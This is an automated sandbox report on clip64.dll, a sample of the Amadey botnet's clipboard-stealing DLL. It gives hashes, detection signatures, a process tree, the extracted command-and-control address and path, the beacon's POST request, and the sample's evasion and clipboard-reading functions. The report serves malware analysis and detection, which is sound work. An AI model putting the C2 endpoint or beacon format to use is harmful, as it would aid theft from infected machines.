Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
clip64.dll

Overview

General Information

Sample name:clip64.dll
Analysis ID:1579622
MD5:7fe5b933ed9391ea24647479c80e904e
SHA1:963721e46b8056e2e883c598e95d7daa7bdf8d9b
SHA256:2e12355cb9b11c923dc06f195399d678bc46680e982856d9405f64e7563fe8b3
Tags:Amadeydlluser-abuse_ch
Infos:

Detection

Amadey
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
C2 URLs / IPs found in malware configuration
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7424 cmdline: loaddll32.exe "C:\Users\user\Desktop\clip64.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7476 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7500 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7484 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7596 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7612 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7728 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7736 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7748 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "212.193.31.8/3ofn3jf3e2ljk2/index.php", "Version": "5.12"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    7.2.rundll32.exe.6eb00000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      11.2.rundll32.exe.6eb00000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-23T06:46:41.952354+010028561511A Network Trojan was detected192.168.2.949731212.193.31.880TCP
        2024-12-23T06:46:44.592932+010028561511A Network Trojan was detected192.168.2.949738212.193.31.880TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: clip64.dllMalware Configuration Extractor: Amadey {"C2 url": "212.193.31.8/3ofn3jf3e2ljk2/index.php", "Version": "5.12"}
        Multi AV Scanner detection for submitted file
        Source: clip64.dllVirustotal: Detection: 69%Perma Link
        Source: clip64.dllReversingLabs: Detection: 68%
        Source: clip64.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        Source: clip64.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB0BCEE FindFirstFileExW,7_2_6EB0BCEE

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.9:49738 -> 212.193.31.8:80
        Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.9:49731 -> 212.193.31.8:80
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 212.193.31.8 80Jump to behavior
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorIPs: 212.193.31.8
        Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: Joe Sandbox ViewIP Address: 212.193.31.8 212.193.31.8
        Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: unknownTCP traffic detected without corresponding DNS query: 212.193.31.8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB01EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,7_2_6EB01EC0
        Source: unknownHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: rundll32.exe, 00000007.00000002.3219366641.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3219366641.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.0000000003297000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.0000000003260000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php
        Source: rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php(
        Source: rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpF
        Source: rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpV
        Source: rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpy
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB031B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,7_2_6EB031B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB031B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,7_2_6EB031B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB031B07_2_6EB031B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB11AB17_2_6EB11AB1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6EB05D90 appears 103 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6EB073B0 appears 34 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6EB06B05 appears 47 times
        Source: clip64.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        Source: classification engineClassification label: mal84.troj.spyw.evad.winDLL@18/0@0/1
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
        Source: clip64.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: clip64.dllVirustotal: Detection: 69%
        Source: clip64.dllReversingLabs: Detection: 68%
        Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\clip64.dll"
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,Main
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,MainJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",MainJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: clip64.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616Thread sleep count: 149 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616Thread sleep time: -149000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7752Thread sleep count: 145 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7752Thread sleep time: -145000s >= -30000sJump to behavior
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB0BCEE FindFirstFileExW,7_2_6EB0BCEE
        Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
        Source: rundll32.exe, 00000007.00000002.3219366641.0000000003029000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3219366641.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.0000000003260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: rundll32.exe, 00000007.00000002.3219366641.0000000003029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZq;
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB07288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6EB07288
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB0A254 mov eax, dword ptr fs:[00000030h]7_2_6EB0A254
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB0B881 mov eax, dword ptr fs:[00000030h]7_2_6EB0B881
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB0D218 GetProcessHeap,7_2_6EB0D218
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB07288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6EB07288
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB06B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6EB06B1A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB09820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6EB09820

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 212.193.31.8 80Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB070A7 cpuid 7_2_6EB070A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EB073F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_6EB073F8

        Stealing of Sensitive Information

        barindex
        Yara detected Amadeys Clipper DLL
        Source: Yara matchFile source: clip64.dll, type: SAMPLE
        Source: Yara matchFile source: 7.2.rundll32.exe.6eb00000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.rundll32.exe.6eb00000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading        		111
        Process Injection        		11
        Virtualization/Sandbox Evasion        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		111
        Process Injection        		LSASS Memory21
        Security Software Discovery        		Remote Desktop Protocol2
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information        		Security Account Manager11
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture11
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Rundll32        		LSA Secrets12
        System Information Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579622 Sample: clip64.dll Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 23 Suricata IDS alerts for network traffic 2->23 25 Found malware configuration 2->25 27 Multi AV Scanner detection for submitted file 2->27 29 2 other signatures 2->29 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 12 7->9         started        12 rundll32.exe 12 7->12         started        15 cmd.exe 1 7->15         started        17 5 other processes 7->17 dnsIp5 31 System process connects to network (likely due to code injection or exploit) 9->31 21 212.193.31.8, 49731, 49738, 80 SPD-NETTR Russian Federation 12->21 19 rundll32.exe 15->19         started        signatures6 process7

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        clip64.dll69%VirustotalBrowse
        clip64.dll68%ReversingLabsWin32.Trojan.Amadey

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        s-part-0035.t-0009.t-msedge.net
        		13.107.246.63
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://212.193.31.8/3ofn3jf3e2ljk2/index.phptrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://212.193.31.8/3ofn3jf3e2ljk2/index.phpyrundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://212.193.31.8/3ofn3jf3e2ljk2/index.php(rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://212.193.31.8/3ofn3jf3e2ljk2/index.phpFrundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://212.193.31.8/3ofn3jf3e2ljk2/index.phpVrundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    212.193.31.8
                    		unknownRussian Federation
                    		57844SPD-NETTRtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579622
                    Start date and time:2024-12-23 06:45:18 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 31s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:16
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:clip64.dll
                    Detection:MAL
                    Classification:mal84.troj.spyw.evad.winDLL@18/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 9
                    • Number of non-executed functions: 28
                    Cookbook Comments:
                    • Found application associated with file extension: .dll
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    212.193.31.8cred64.dll.dllGet hashmaliciousAmadeyBrowse
                    • 212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1
                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                    • 212.193.31.8/3ofn3jf3e2ljk2/index.php
                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                    • 212.193.31.8/3ofn3jf3e2ljk2/index.php
                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                    • 212.193.31.8/3ofn3jf3e2ljk2/index.php
                    6X4odkIkyK.exeGet hashmaliciousAmadeyBrowse
                    • 212.193.31.8/3ofn3jf3e2ljk2/index.php

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    s-part-0035.t-0009.t-msedge.nethttps://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                    • 13.107.246.63
                    https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=Ne7lLAcjQUaMUQJ9C8JRxUnNOxFiqmxEvtl5lDv69HJUMDcyQThVMFBaMzdYWTM3RDY1SVZJUUVaSC4uGet hashmaliciousUnknownBrowse
                    • 13.107.246.63
                    https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                    • 13.107.246.63
                    1734732185f25c13093a41a2402fb93b0e0049d55263e81e9d0e56f9c3736f6444c26eed34495.dat-decoded.exeGet hashmaliciousLummaCBrowse
                    • 13.107.246.63
